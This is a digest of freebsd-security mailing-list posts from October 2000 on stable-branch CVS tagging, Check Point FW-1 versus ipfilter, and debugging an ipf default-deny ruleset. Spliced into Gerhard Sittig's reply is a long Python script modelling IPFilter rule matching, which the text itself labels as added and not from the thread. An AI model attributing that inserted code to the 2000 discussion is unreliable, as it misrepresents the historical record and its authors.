From owner-freebsd-security Sun Oct 8 0:28:28 2000
From: "Daniel C. Sobral"
Date: Sun, 08 Oct 2000 16:27:01 +0900
To: "Jeffrey J. Mountin"
Cc: Robert Watson, "Matthew D. Fuller", Jordan Hubbard, John Baldwin, freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org
Subject: Re: Stable branch
Message-ID: <39E021C5.1F5DEE48@newsguy.com>
References: <4.3.2.20001007161924.00b72460@207.227.119.2> <4.3.2.20001007214506.00bb7c10@207.227.119.2>

"Jeffrey J. Mountin" wrote:
>
> One other idea that cropped up would be if we want to set this up for the
> more troublesome releases like 3.2 to force them to upgrade to a later
> version. Think that only 3.4+ should be considered due to a large enough
> install base to consider.

Err... we would consider it only for 4.2+. This is not something we can go
back and do for previous versions without going insane. New model, new
versions.

--
Daniel C. Sobral (8-DCS)
dcs@newsguy.com
dcs@freebsd.org
capo@linux.bsdconspiracy.net

	the ants all left because mtn. dew is sold out again

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security Sun Oct 8 0:43:50 2000
From: Bill Fumerola
Date: Sun, 8 Oct 2000 03:43:30 -0400
To: Wes Peters
Cc: Gregory Sutter, Craig Cowen, "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-ID: <20001008034330.X38472@jade.chc-chimes.com>
In-Reply-To: <39E010FE.8CAA2CB1@softweyr.com>; from wes@softweyr.com on Sun, Oct 08, 2000 at 12:15:26AM -0600
References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com>

On Sun, Oct 08, 2000 at 12:15:26AM -0600, Wes Peters wrote:

> Others have mentioned a couple of commercial alternatives; add NetMax and
> GnatBox (right?) to this list. Also, be sure to get a copy of my paper
> for BSDCon explaining why my company decided to use BSD and ipfilter to
> build the firewall of the future on. (Sorry, it's not a corporate firewall
> and is not suited for your use.)

As long as Wes is plugging his talk, mine will be talking about ipfw and
stopping attacks and such. Guido van Rooij is also giving an ipfilter talk
I'm looking forward to attending. Firewalls are well represented at this
year's BSDcon.

--
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org


From owner-freebsd-security Sun Oct 8 2:34:56 2000
From: David Talkington
Date: Sun, 8 Oct 2000 04:34:56 -0500 (CDT)
To: "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
In-Reply-To: <200010080427.PAA19412@cairo.anu.edu.au>

>What is really the difference is being able to dial 1-800-FIREWALL and
>have someone help you out, etc.
>Darren

Yeah, I wonder if my (item b) instinct was unfair. David Pick mentioned
herein the possibility that the company might not even WANT the expertise
to be in-house, and while his scenario was pretty ugly, it suggests a more
benign one ... if the company goes with an open-source solution, and you're
the only one on staff who knows how to use it, they are then dependent on
your talent. Great for you, but bad for them, if turnover is high. At least
a purchased solution ensures some kind of support no matter who leaves the
company.

Your thoughts on this? Seems like a valid concern, and not one that I had
considered. (Perhaps I'm naive ... )

-d

--
David Talkington
Prairienet / Community Networking Initiative
217-244-1962
dtalk@prairienet.org

PGP Key: http://www.prairienet.org/~dtalk/dt000823.asc


From owner-freebsd-security Sun Oct 8 3:36:49 2000
From: Craig Cowen
Date: Sun, 08 Oct 2000 03:40:20 -0700
To: David Talkington
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-ID: <39E04F14.B3CE226C@allmaui.com>

Well I sure have stirred up a topic.

Unfortunately, whoever made the point of covering their (the suits) asses
by means of accountability hit the nail on the head. That and not being
dependent on me. But I argue on that point that there are many out there
who could utilize IPF. More important, if the person who will be
administering FW-1 can't, then he/she doesn't know enough about the
practice.

Opinions, like assholes (and this list proves what I am about to say),
everybody has one. Here is mine.

NT has no reason on this planet except for people who want to reboot their
workstation once a week instead of once a day. As a matter of fact, given
the choice between an NT box and a Mac, I would go back to bussing tables.
Unix is where it is at, Solaris, BSD, Linux, whatever, there is no equal
and there never will be.

As for 1-800-helpmeIseebluescreens, they are dumber than the people who
choose to purchase the product in the first place and have only cheat
sheets created by the engineers who know what will fail because the suits
above them had to rush their overpriced product to market so that they
could go IPO and not under.

Just my Opinion/Rant/Frustration

Craig

David Talkington wrote:
>
> >What is really the difference is being able to dial 1-800-FIREWALL and
> >have someone help you out, etc.
> >Darren
>
> Yeah, I wonder if my (item b) instinct was unfair. David Pick
> mentioned herein the possibility that the company might not even WANT
> the expertise to be in-house, and while his scenario was pretty ugly,
> it suggests a more benign one ... if the company goes with an
> open-source solution, and you're the only one on staff who knows how
> to use it, they are then dependent on your talent. Great for you, but
> bad for them, if turnover is high. At least a purchased solution
> ensures some kind of support no matter who leaves the company.
>
> Your thoughts on this? Seems like a valid concern, and not one that I
> had considered. (Perhaps I'm naive ... )
>
> -d
>
> --
> David Talkington
> Prairienet / Community Networking Initiative
> 217-244-1962
> dtalk@prairienet.org
>
> PGP Key: http://www.prairienet.org/~dtalk/dt000823.asc


From owner-freebsd-security Sun Oct 8 4:19:21 2000
From: Eivind Eklund
Date: Sun, 8 Oct 2000 13:19:08 +0200
To: Robert Watson
Cc: "Jeffrey J. Mountin", "Matthew D. Fuller", Jordan Hubbard, John Baldwin, freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org
Subject: Re: Stable branch
Message-ID: <20001008131908.B78013@warning.follo.net>
References: <4.3.2.20001007214506.00bb7c10@207.227.119.2>

On Sat, Oct 07, 2000 at 11:36:05PM -0400, Robert Watson wrote:
>
> On Sat, 7 Oct 2000, Jeffrey J. Mountin wrote:
>
> > Now your earlier proposal makes better sense. A lot more for the
> > CVS-meisters to deal with, but they can answer that magic question.
> > Also may be an issue to branch old releases, then it might be worth
> > doing all the branching at one time and disallowing access.
>
> Well, at least for the purposes of the release engineer, the major change
> is adding a "-b" to the CVS tag operation. However, an important
> question, which you raised in a prior e-mail, is whether or not this
> places an undue burden on CVS due to expensive branch handling. My hope
> is that it would be not, but presumably a CVS meister (Peter?) should
> enlighten us.

In CVS, the extra load for creating a branch tag instead of a point tag is
two bytes per file. However, in order to do this right we should also have
a branch point tag. The cost for this is approx 30 bytes per file. I do not
think the load on the cvsup servers will increase problematically (we'd be
able to measure it, but I don't think we'd notice it unless we specifically
went looking.)

Warner's technique of adding the branch tag for only those files we
actually modify would negate the 30-byte cost, but I don't think it is
worthwhile. If we want to negate that cost, it'd be better to mod CVS to
be able to easily reference the base of a branch tag (as the branch point
tag is done to get around problems in the CVS user interface.)

Eivind.


From owner-freebsd-security Sun Oct 8 4:21:58 2000
From: Gerhard Sittig
Organization: System Defenestrators Inc.
Date: Sat, 7 Oct 2000 17:11:53 +0200
To: "freebsd-security@FreeBSD.ORG"
Subject: Re: Default Deny
Message-ID: <20001007171153.P31338@speedy.gsinet>
In-Reply-To: <39DE8D1B.923D86DF@allmaui.com>; from craig@allmaui.com on Fri, Oct 06, 2000 at 07:40:27PM -0700
References: <200010060056.LAA11152@cairo.anu.edu.au> <39DCC1CB.5FDD7F90@allmaui.com> <20001006204807.M31338@speedy.gsinet> <39DE8D1B.923D86DF@allmaui.com>

[ citing Craig Cowen's initial message; I wish one wouldn't have to go to
the end just to learn what the answer at the top is about at all, this puts
additional (and unnecessary) load on those you want to help you -- it
doesn't always work well ]

> > > I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my
> > > kernel. When using ipnat, I have 'pass in on (private
> > > interface) from 192.168.0.0/24 to any keep state' in my
> > > rules. [ ... ] I have no rules specified for the public
> > > interface. The boxen behind the firewall can surf.

On Fri, Oct 06, 2000 at 19:40 -0700, Craig Cowen wrote:
> I appreciate your response and your questions.
> Yes I did compile and install.
> You sound like me talking to my users at work.

I guess we all have been through this at least once. I found myself in the
past configuring, compiling and installing kernels, even booting them, but
not making them the default boot option. Imagine my surprise not
recognizing the machine's behaviour after the next boot cycle (a few weeks
later) ... :)

From what you stated ("I block by default, have only one permissive rule
and yet it works") there was no chance to solve the riddle. So you either
have to help those you expect to help you with needed information or you
will get accused of ignorance and laziness (or get ignored). It's your
presentation influencing reactions. :>

> ipf -V:
> ipf: IP Filter: v3.4.8 (264)
> Kernel: IP Filter: v3.4.8
> Running: yes
> Log Flags: 0 = none set
> Default: block all, Logging: available
           ^^^^^^^^^
> Active list: 0

That was the important stuff I wanted to make sure. BTW the request to do
"ipf -V; ipfstat -in; etc" was meant mainly for yourself (confirming it
made its way into ipf code's tables and gets looked up), unless you wanted
to publish your setup.

To be able to read the rules, one would have to know what's your "private
interface" with the "pass in from RFC1918" rule. I guess it's the following
block:

> hopefully paranoia hasn't ruined this
> ipfstat -in
> [ ... ]
> @13 pass in on dc0 proto tcp from 192.168.1.0/24 to any keep state
> @14 pass in on dc0 proto udp from 192.168.1.0/24 to any keep state
> @15 pass in on dc0 proto icmp from 192.168.1.0/24 to any keep state

These packets make it into the machine, get NATed (the rule for which is
missing, here, but shouldn't matter very much) and have to make their way
"out into the world". This is done by these rules:

> ipfstat -on
>
> @4 pass out log quick proto tcp from publicinterface/32 to any keep state
>    #This is necessary to allow me to surf out from my firewall box
> @5 pass out log quick proto udp from publicinterface/32 to any keep state
>    #with these commented out I am still able to surf from inside
> @6 pass out log quick proto icmp from publicinterface/32 to any keep state

And since you (or ipf, respectively) keep state, the answers are allowed
back in.

I don't know what the other rules are meant for. Maybe it should read "from
192.168.1.x/32 to 192.168.1.0/24" to say "let the fw box talk to internal
machines". (BTW they seemed to have moved since your last message from the
0.0 net to 1.0 :)

> @7 pass out on dc0 proto tcp from 192.168.1.0/24 to 192.168.1.0/24
> @8 pass out on dc0 proto udp from 192.168.1.0/24 to 192.168.1.0/24
> @9 pass out on dc0 proto icmp from 192.168.1.0/24 to 192.168.1.0/24

I guess instead of running some more circles of catching info on the
freebsd-security list you might want to search the ipf lists and have a
look at the ipftest utility (maybe in reverse order, ipftest is available
locally, already). You feed the latter with a description of packets you
see as legitimate or to be blocked (e.g. you describe sessions or streams)
and the program tells you what it would do to these and why. There are
several modes of verbosity and you can even use tcpdump captured
descriptions when you don't want to write them yourself. So ipftest lets
you dry-test and improve your rules based on the sessions you know to need
and how they've happened. Look around in /usr/src/contrib/ipfilter and you
find more interesting documentation, including many more examples.

> I use this to reload my settings after changes
>
> #!/bin/sh
> ipf -D
> ipf -Fa -f /etc/ipf.conf -E
> ipnat -CF -f /etc/ipnat.conf

I would prefer something like

  ipf -I -Fa -f /etc/ipf.conf -v
  ( ipf -s; sleep 60; ipf -s; ) &   # heavy testing until the prompt returns
  ipf -s                            # only when you're happy with what the test showed

This will make you recognize syntactic mistakes at load time without the
preceding flush for the active ruleset and works even at remote machines
and still leaves you in a working state in case you broke your rule set
(logical errors in content a parser cannot tell you about). It's the
advantage of having two swappable rule sets, make use of it!

And I wouldn't give the -F option to ipnat as well as I wouldn't give -E to
ipf when it's about *reloading* -- see the manpages for details. Even for
initial setup -E will be wrong in case you made ipfilter an integral part
of your kernel and not a module (when you block by default, I assume you
don't make ipf a module -- it's about minimizing or even eliminating
windows of vulnerability).

*plug* PR conf/20202 (rc hooks for ipf) made it into -CURRENT yesterday and
has to prove to be complete, correct and stable. I invite ipf users to test
it and provide feedback in good and bad directions. When the patch survives
one month in -CURRENT, it could hopefully make it into 4.2R (scheduled for
mid November IIRC) or start another cycle of improvement in case it misses
something or turns out to be dangerous. :)

> [ ... deleted the fullquote ... ]


virtually yours   82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig    true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.
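Gerhard points at ipftest for dry-testing a rule set. As an added illustration (not code from the thread, from IPFilter, or from ipftest itself), the following Python models the verdict ipftest would report for the tcp rules quoted above: the last matching rule wins, a matching "quick" rule ends the walk, a packet matching an existing state entry passes without any rule lookup, and with IPFILTER_DEFAULT_BLOCK a packet matching no rule is blocked. It substitutes the constructed address 203.0.113.1 for the thread's "publicinterface/32" placeholder, assumes fxp0 as the public interface name, and leaves NAT and port numbers out of the model.

```python
"""Toy model of the IPFilter rule walk: last matching rule wins, a matching
'quick' rule ends the walk, packets matching a state entry pass without any
rule lookup, and (IPFILTER_DEFAULT_BLOCK) no match means block.
NAT and port numbers are deliberately left out of the model."""
import ipaddress
import re
from collections import namedtuple

# The tcp rules quoted in the thread (ipfstat -in / ipfstat -on output).
# The thread's "publicinterface/32" placeholder is replaced by the
# constructed address 203.0.113.1/32; fxp0 is an assumed public interface.
RULES = """
@13 pass in on dc0 proto tcp from 192.168.1.0/24 to any keep state
@4 pass out log quick proto tcp from 203.0.113.1/32 to any keep state
@7 pass out on dc0 proto tcp from 192.168.1.0/24 to 192.168.1.0/24
"""
RULE_RE = re.compile(
    r"@(?P<num>\d+)\s+(?P<action>pass|block)\s+(?P<dir>in|out)"
    r"(?P<opts>(?:\s+(?:log|quick|on\s+\S+))*)"
    r"\s+proto\s+(?P<proto>\w+)\s+from\s+(?P<src>\S+)\s+to\s+(?P<dst>\S+)"
    r"(?P<state>\s+keep\s+state)?\s*$")

# Packet: direction is "in" or "out" as seen by the firewall host.
Packet = namedtuple("Packet", "direction iface proto src dst")
# Rule: iface None means any interface; src/dst None means "any".
Rule = namedtuple("Rule", "num action direction iface quick proto src dst keep_state")


def _net(text):
    return None if text == "any" else ipaddress.ip_network(text, strict=False)


def parse_rules(text):
    """Parse ipfstat-style rule lines into Rule tuples, in listed order."""
    rules = []
    for line in text.strip().splitlines():
        m = RULE_RE.match(line.strip())
        if m is None:
            raise ValueError("unparsed rule: " + line)
        opts = m.group("opts").split()
        iface = opts[opts.index("on") + 1] if "on" in opts else None
        rules.append(Rule(int(m.group("num")), m.group("action"), m.group("dir"),
                          iface, "quick" in opts, m.group("proto"),
                          _net(m.group("src")), _net(m.group("dst")),
                          m.group("state") is not None))
    return rules


def matches(rule, pkt):
    if (rule.direction, rule.proto) != (pkt.direction, pkt.proto):
        return False
    if rule.iface is not None and rule.iface != pkt.iface:
        return False
    return all(net is None or ipaddress.ip_address(addr) in net
               for net, addr in ((rule.src, pkt.src), (rule.dst, pkt.dst)))


class Firewall:
    def __init__(self, rules, default="block"):
        self.rules, self.default = rules, default   # IPFILTER_DEFAULT_BLOCK
        self.state = set()   # (proto, src, dst) tuples of known sessions

    def check(self, pkt):
        """Return (action, reason), much as ipftest reports its verdict."""
        key = (pkt.proto, pkt.src, pkt.dst)
        if key in self.state:
            return "pass", "state"
        action, matched = self.default, None
        for rule in self.rules:
            if matches(rule, pkt):
                action, matched = rule.action, rule
                if rule.quick:            # quick: the first match is final
                    break
        if matched is not None and action == "pass" and matched.keep_state:
            self.state.add(key)
            self.state.add((pkt.proto, pkt.dst, pkt.src))   # admit the reply
        return action, ("@%d" % matched.num) if matched is not None else "default"


def surfing_demo():
    """Why LAN hosts can surf although no rule names the public interface."""
    fw = Firewall(parse_rules(RULES))
    lan = fw.check(Packet("in", "dc0", "tcp", "192.168.1.5", "198.51.100.7"))
    reply = fw.check(Packet("in", "fxp0", "tcp", "198.51.100.7", "192.168.1.5"))
    stray = fw.check(Packet("in", "fxp0", "tcp", "198.51.100.9", "192.168.1.5"))
    host = fw.check(Packet("out", "fxp0", "tcp", "203.0.113.1", "198.51.100.7"))
    return lan, reply, stray, host


def ordering_demo():
    """Last match wins, unless the earlier matching rule is 'quick'."""
    pkt = Packet("in", "fxp0", "tcp", "192.0.2.10", "203.0.113.1")
    block_then_pass = ("@1 block in on fxp0 proto tcp from any to any\n"
                       "@2 pass in on fxp0 proto tcp from 192.0.2.0/24 to any")
    slow = Firewall(parse_rules(block_then_pass))
    fast = Firewall(parse_rules(block_then_pass.replace("block in", "block in quick")))
    return slow.check(pkt), fast.check(pkt)
```

The unsolicited packet on fxp0 is blocked by the default policy alone, which is the "no rules on the public interface, yet the boxen can surf" behaviour Craig described.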
From owner-freebsd-security Sun Oct 8 5:14:42 2000
From: "Jeffrey J. Mountin"
Date: Sun, 08 Oct 2000 07:13:17 -0500
To: David Talkington, "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-Id: <4.3.2.20001008070308.00b9ae90@207.227.119.2>
References: <200010080427.PAA19412@cairo.anu.edu.au>

At 04:34 AM 10/8/00 -0500, David Talkington wrote:
>Yeah, I wonder if my (item b) instinct was unfair. David Pick
>mentioned herein the possibility that the company might not even WANT
>the expertise to be in-house, and while his scenario was pretty ugly,
>it suggests a more benign one ... if the company goes with an
>open-source solution, and you're the only one on staff who knows how
>to use it, they are then dependent on your talent. Great for you, but
>bad for them, if turnover is high. At least a purchased solution
>ensures some kind of support no matter who leaves the company.
>
>Your thoughts on this? Seems like a valid concern, and not one that I
>had considered. (Perhaps I'm naive ... )

That is why they should require documentation. Your peers, if any, should
be able to follow it and fill in at need.

Another reason why they may not wish to go with "in-house" talent is the
idea to outsource. Companies do this so they don't have to pay for a
full-time employee or reallocate internal resources for projects. In some
cases it is worthwhile. Other times it's an endless black hole. Can only
blame the suits for taking this idea too far at times.


Jeff Mountin - jeff@mountin.net
Systems/Network Administrator
FreeBSD - the power to serve


From owner-freebsd-security Sun Oct 8 8:49:28 2000
From: Garrett Wollman
Date: Sun, 8 Oct 2000 11:48:44 -0400 (EDT)
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Check Point FW-1
Message-Id: <200010081548.LAA05947@khavrinen.lcs.mit.edu>
In-Reply-To: <200010080427.PAA19412@cairo.anu.edu.au>
References: <200010080427.PAA19412@cairo.anu.edu.au>

< said:

> For the record, you can't sue anyone who's got the "standard" software
> license/disclaimer over the failure of it to perform or be bug free.
> Read it one day and actually see what it's all about.

Um, yes and no. It varies from jurisdiction to jurisdiction. Here in
Massachusetts, there is no legally valid waiver of the right to sue, and
implied warranties are difficult to disclaim. I do not know, however,
whether anyone has tested this relative to a commercial software license
before -- but there is a reason most licenses which include a warranty
clause say something like ``this warranty gives you specific legal rights,
and you may have other rights which vary from jurisdiction to
jurisdiction.''

-GAWollman


From owner-freebsd-security Sun Oct 8 9:17:27 2000
From: Cy Schubert - ITSD Open Systems Group
Reply-To: Cy Schubert - ITSD Open Systems Group
Date: Sun, 08 Oct 2000 09:13:55 -0700
To: Wes Peters
Cc: Darren Reed, David Talkington, Craig Cowen, "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-Id: <200010081614.e98GEBC13248@cwsys.cwsent.com>
In-reply-to: Your message of "Sat, 07 Oct 2000 22:45:30 MDT." <39DFFBE9.546DFE24@softweyr.com>

In message <39DFFBE9.546DFE24@softweyr.com>, Wes Peters writes:
> Darren Reed wrote:
> >
> > In some mail from David Talkington, sie said:
> > >
> > > b) To a boss concerned about the bottom line, a purchase equals
> > > accountability (e.g., someone to sue when it breaks). This is (in my
> > > humble opinion) typical of management that doesn't really care about
> > > security of the company's data per se, but just wants their personal
> > > asses covered.
> >
> > For the record, you can't sue anyone who's got the "standard" software
> > license/disclaimer over the failure of it to perform or be bug free.
> > Read it one day and actually see what it's all about.
>
> But you can threaten to stop paying them tens of thousands of dollars in
> customer/technical non-support contract fees if they don't come up with
> a fix real fast.

On the flip side, the vendor can raise the price of licensing and support,
then you're stuck. Take a look at Oracle's new pricing. Time to buy Oracle
stock at least for the short term :)


Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC


From owner-freebsd-security Sun Oct 8 9:26:14 2000
From: Wes Peters
Organization: Softweyr LLC
Date: Sun, 08 Oct 2000 10:36:03 -0600
To: Bill Fumerola
Cc: Gregory Sutter, Craig Cowen, "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-ID: <39E0A273.E2243C9A@softweyr.com>
References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com> <20001008034330.X38472@jade.chc-chimes.com>

Bill Fumerola wrote:
>
> On Sun, Oct 08, 2000 at 12:15:26AM -0600, Wes Peters wrote:
>
> > Others have mentioned a couple of commercial alternatives; add NetMax and
> > GnatBox (right?) to this list. Also, be sure to get a copy of my paper
> > for BSDCon explaining why my company decided to use BSD and ipfilter to
> > build the firewall of the future on. (Sorry, it's not a corporate firewall
> > and is not suited for your use.)
>
> As long as Wes is plugging his talk, mine will be talking about ipfw and stopping
> attacks and such. Guido van Rooij is also giving an ipfilter talk I'm looking
> forward to attending. Firewalls are well represented at this year's BSDcon.

Sorry, Bill, I should've mentioned your talk and Guido's. I presented mine
as a refutation of the original writer's "the bosses want to go with a
commercial solution". This is going to be a great Con, and surprise
surprise security is THE hot topic this year.

--
            "Where am I, and what am I doing in this handbasket?"

Wes Peters                                                         Softweyr LLC
wes@softweyr.com                                           http://softweyr.com/


From owner-freebsd-security Sun Oct 8 9:30:03 2000
From: Wes Peters
Organization: Softweyr LLC
Date: Sun, 08 Oct 2000 10:40:43 -0600
To: David Talkington
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-ID: <39E0A38B.728C3C50@softweyr.com>

David Talkington wrote:
>
> >What is really the difference is being able to dial 1-800-FIREWALL and
> >have someone help you out, etc.
> >Darren
>
> Yeah, I wonder if my (item b) instinct was unfair. David Pick
> mentioned herein the possibility that the company might not even WANT
> the expertise to be in-house, and while his scenario was pretty ugly,
> it suggests a more benign one ... if the company goes with an
> open-source solution, and you're the only one on staff who knows how
> to use it, they are then dependent on your talent. Great for you, but
> bad for them, if turnover is high. At least a purchased solution
> ensures some kind of support no matter who leaves the company.
>
> Your thoughts on this? Seems like a valid concern, and not one that I
> had considered. (Perhaps I'm naive ... )

This sounds like an excellent opportunity to sell them on the open source
route, then parlay it into a consulting business. ;^)

It is a viable concern from the business standpoint. A part of the problem
is the insistence of short-sighted businesses in not having two-deep
training on essential technologies. Contracting an outside firm is supposed
to gain this two- (or more) deep support, with only the staffing costs that
you actually need. Perhaps you could find a local firm that provides such
consulting as a backup, and pay the small fee to keep them up to date on
your configuration so they can take over, at least temporarily, if you get
hit by a bus.

--
            "Where am I, and what am I doing in this handbasket?"

Wes Peters                                                         Softweyr LLC
wes@softweyr.com                                           http://softweyr.com/


From owner-freebsd-security Sun Oct 8 12:57:23 2000
From: "Crist J. Clark"
Reply-To: cjclark@alum.mit.edu
Date: Sun, 8 Oct 2000 12:57:15 -0700
To: Brian Reichert
Cc: Craig Cowen, "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-ID: <20001008125715.T25121@149.211.6.64.reflexcom.com>
In-Reply-To: <20001007133304.B54883@numachi.com>; from reichert@numachi.com on Sat, Oct 07, 2000 at 01:33:04PM -0400
References: <39DEBB51.E51BACFB@allmaui.com> <20001007133304.B54883@numachi.com>

On Sat, Oct 07, 2000 at 01:33:04PM -0400, Brian Reichert wrote:
> On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote:
> > The big cheeses at work want to use check point instead of ipf or any
> > other open source solution.
> > Can anybody help me with vulnerabilities to this so that I can change
> > their minds?
>
> I found that Checkpoint 4.0 (this may have changed) doesn't do NAT
> right; it uses NAT across _all_ interfaces, instead of letting you
> pick one.

Right, it determines whether to do NAT by source address, destination
address, and destination port. Actually, it is not possible to do
_anything_ per interface from the GUI. Wouldn't it be nice (and wouldn't
you expect a firewall to be able) to block anything not destined for a
small block of registered IPs at the external interface? Well, you can't
put a rule to do that in the GUI.

> This means if you have two internal nets that are connected to the
> firewall box, the traffic between them seems as if it's coming from
> the public interface. This can confuse ACLs...

Yep, you end up writing extra rules to make the NAT work by the source and
destination addresses if you stick to the GUI alone.

> (You suppose can Do the Right Thing, but their silly GUI tool
> imposes a ton of work on you to accomplish it...)

Exactly, another reason for the I Hate GUIs attitude. People, including
several people in this thread, say how neat-o the FW-1 GUI is.
However, if you want to do anything serious with the firewall, you need to hack the scripts the GUI generates (the GUI generates scripts which are what is read by the actual firewall daemons, called "INSPECT" scripts or something?). It ends up that you need to either write really contorted (and typically less secure) rules to simulate a rule on an interface or you need to hack the scripts manually (you _can_ specify per interface rules in the scripts). Don't get me started on the GUI log viewer. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 13: 3: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id C2AF837B503 for ; Sun, 8 Oct 2000 13:03:03 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 8 Oct 2000 13:01:46 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e98K31m83260; Sun, 8 Oct 2000 13:03:01 -0700 (PDT) (envelope-from cjc) Date: Sun, 8 Oct 2000 13:03:01 -0700 From: "Crist J . Clark" To: "Jeffrey J. Mountin" Cc: David Talkington , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001008130301.U25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <200010080427.PAA19412@cairo.anu.edu.au> <4.3.2.20001008070308.00b9ae90@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <4.3.2.20001008070308.00b9ae90@207.227.119.2>; from jeff-ml@mountin.net on Sun, Oct 08, 2000 at 07:13:17AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 08, 2000 at 07:13:17AM -0500, Jeffrey J. 
Mountin wrote: [snip] > Another reason why they may not wish to go with "in-house" talent is the > idea to out source. Companies do this so they don't have to pay for a > full-time employee or reallocate internal resources for projects. In some > cases it is worthwhile. Other times it's an endless black hole. Can only > blame the suits for taking this idea too far at times. Another reason, and this is not necessarily the management's fault, is the lack of qualified people available. At least this is the case in many, if not most, parts of the US. There are a lot of qualified people who are only interested in doing contract work. If you have the choice of hiring, (a) no one, (b) a not-qualified full time person, or (c) a qualified contract person, for a job that needs to be done NOW, what choice does management really have? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 13:12:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id DAA2237B66C for ; Sun, 8 Oct 2000 13:12:31 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 8 Oct 2000 13:10:24 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e98KBPq83322; Sun, 8 Oct 2000 13:11:25 -0700 (PDT) (envelope-from cjc) Date: Sun, 8 Oct 2000 13:11:25 -0700 From: "Crist J . 
Clark" To: Wes Peters Cc: Bill Fumerola , Gregory Sutter , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001008131125.V25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com> <20001008034330.X38472@jade.chc-chimes.com> <39E0A273.E2243C9A@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <39E0A273.E2243C9A@softweyr.com>; from wes@softweyr.com on Sun, Oct 08, 2000 at 10:36:03AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 08, 2000 at 10:36:03AM -0600, Wes Peters wrote: > Bill Fumerola wrote: > > > > On Sun, Oct 08, 2000 at 12:15:26AM -0600, Wes Peters wrote: > > > > > Others have mentioned a couple of commercial alternatives; add NetMax and > > > GnatBox (right?) to this list. Also, be sure to get a copy of my paper > > > for BSDCon explaining why my company decided to use BSD and ipfilter to > > > build the firewall of the future on. (Sorry, it's not a corporate firewall > > > and is not suited for your use.) > > > > As long as Wes is plugging his talk, mine will be talking about ipfw and stopping > > attacks and such. Guido van Rooij is also giving an ipfilter talk I'm looking > > forward to attending. Firewalls are well represented at this years BSDcon. > > Sorry, Bill, I should've mentioned your talk and Guido's. I presented mine as > a refutation of the orinal writer's "the bosses want to go with a commercial > solution". This is going to be a great Con, and surprise surprise security is > THE hot topic this year. That seems somewhat funny since SANS is having a confrence in Monterey at the same time. Where will papers or presentation materials be published? 
